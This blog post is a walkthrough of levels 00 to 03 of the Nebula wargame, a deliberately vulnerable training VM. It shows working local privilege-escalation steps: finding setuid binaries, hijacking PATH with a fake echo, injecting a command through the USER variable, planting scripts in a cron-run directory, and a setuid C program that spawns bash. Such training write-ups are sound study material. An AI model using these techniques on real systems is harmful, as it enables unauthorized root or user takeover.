blog.smigiel.dev

Sep 05, 2020

Exploit Education - Nebula Part 1

Nebula

Basics

Nebula VM has 20 levels. Each level can be accessed with levelXX username and the same password.

Level 00

Solution

find / -type f -user flag00 -perm -0400 2>/dev/null

Search for all files, in all directories, belonging to flag00 user, with setuid. Redirect all "permission error" (stderr) messages to /dev/null discarding those messages.

Result

level00@nebula:~$ getflag
getflag is executing on a non-flag account, this doesn't count
level00@nebula:~$ find / -type f -user flag00 -perm -0400 2>/dev/null
/bin/.../flag00
/home/flag00/.bash_logout
/home/flag00/.bashrc
/home/flag00/.profile
level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

Level01

Solution

Program allows to execute arbitrary program due to system call for echo. Let's create fake echo with to run bash session with flag01 UID.

Result

level01@nebula:~$ getflag
getflag is executing on a non-flag account, this doesn't count
level01@nebula:~$ cat > /tmp/echo << EOF
> #!/usr/bin/env bash
> bash
> EOF
level01@nebula:~$ chmod +x /tmp/echo
level01@nebula:~$ cd ~flag01/
level01@nebula:/home/flag01$ ./flag01
and now what?
level01@nebula:/home/flag01$ PATH=/tmp:$PATH ./flag01
flag01@nebula:/home/flag01$ getflag
You have successfully executed getflag on a target account

Level02

Solution

Program is reading USER variable, which can be provided by attacker.

Result

level02@nebula:~$ getflag
getflag is executing on a non-flag account, this doesn't count
level02@nebula:~$ USER=";bash #" /home/flag02/flag02
about to call system("/bin/echo ;bash # is cool")

flag02@nebula:~$ getflag
You have successfully executed getflag on a target account

Level03

Solution

Cron is running script which is picking up content of writable.d directory. It is executing whatever is there. It means, that anything what is running via cron, will have the same permissions.

Result

level03@nebula:~$ getflag
getflag is executing on a non-flag account, this doesn't count
level03@nebula:~$ cd ~flag03
level03@nebula:/home/flag03$ cat > writable.d/flag << EOF
> #!/usr/bin/env bash
> getflag > /tmp/flag.result
> EOF
level03@nebula:/home/flag03$ cat /tmp/flag.result
You have successfully executed getflag on a target account

Solution2

Prepare simple C program to gain bash access

Result2

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int main() {
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);
  system("/bin/bash");
}
level03@nebula:/tmp$ cat > /home/flag03/writable.d/exploit.sh << EOF
> #!/usr/bin/env bash
> cp /tmp/exploit /home/flag03/exploitable
> chmod u+s /home/flag03/exploitable
> EOF

Mistakes

First

I tried to create copy of exploit program in /tmp directory. However, when I tried to run it, it didn't give me flag03 user. After looking into /etc/fstab it became obvious:

flag03@nebula:/home/flag03$ cat /etc/fstab
overlayfs / overlayfs rw 0 0
tmpfs /tmp tmpfs nosuid,nodev 0 0

tmpfs has nosuid option. It means, that the nosuid mount option specifies that the filesystem cannot contain set userid files.

Second

When I found that nosetuid is preventing from running program from within /tmp, I decided to copy exploit to /home/level03. It failed, because default user running writable.sh wasn't root but flag03. Solution was to copy payload to /home/flag03 directory.